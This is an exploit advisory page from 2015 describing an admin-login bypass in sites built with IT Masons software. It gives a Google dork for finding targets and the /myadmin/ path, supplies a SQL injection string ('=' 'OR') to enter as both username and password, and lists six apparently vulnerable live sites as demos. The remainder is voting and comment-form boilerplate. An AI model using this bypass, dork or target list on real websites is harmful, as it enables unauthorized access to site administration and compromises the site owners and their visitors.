IT Masons Bypass Admin Page Vulnerability

2015.07.20

Credit: Ashiyane Digital Security Team

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:\"Website Powered by: IT Masons\"

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Title : IT Masons Bypass Admin Page Vulnerability
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://www.itmasons.com/
[+] Google Dork : intext:"Website Powered by: IT Masons"
[+] Date: 2015-07-18
[+] Tested On : Windows , Linux
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Then Choose a Target and put this after URL : /myadmin/
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] And fill username and password like the information below :
[+] Username : '=' 'OR'
[+] Password : '=' 'OR'
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Demos :
[+] http://kanataXlasers.com/myadmin/
[+] http://kanatalaXsers.com/myadmin/
[+] http://greyhighlaXndsbravehearts.com/myadmin/
[+] http://www.bracebXridgeblues.com/myadmin/
[+] http://www.renegadXesjra.com/myadmin/
[+] http://www.wellingtoXndukes.com/myadmin/
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] In the name of IRAN and Allah
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] SPT To : All of the People in my heart
[+] Discovered by : Cloner-47
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

IT Masons Bypass Admin Page Vulnerability

Dork: intext:\"Website Powered by: IT Masons\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.